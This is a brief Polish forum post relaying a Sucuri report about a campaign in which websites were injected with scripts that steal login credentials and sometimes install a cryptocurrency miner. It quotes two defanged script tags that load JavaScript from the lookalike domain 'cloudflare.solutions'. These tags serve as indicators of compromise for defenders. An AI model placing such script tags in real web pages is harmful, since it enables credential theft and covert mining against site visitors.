07.12.2017, 20:11
Na dokładnie
O sprawie poinformowała na swoim blogu firma Sucuri
Źródło
[Aby zobaczyć linki, zarejestruj się tutaj]
zidentyfikowano szkodliwe skrypty, które przechwytują dane logowania i czasem dodatkowo instalują koparkę kryptowaluty.Kod:
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js' >< /script >
< script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js' >< /script >
O sprawie poinformowała na swoim blogu firma Sucuri
[Aby zobaczyć linki, zarejestruj się tutaj]
Analiza danych wykazała, że akcja rozpoczęła się jeszcze w kwietniu tego roku, a skrypty ładowane są z domeny "cloudflare.solutions" i nie mają absolutnie nic wspólnego z CloudflareŹródło
[Aby zobaczyć linki, zarejestruj się tutaj]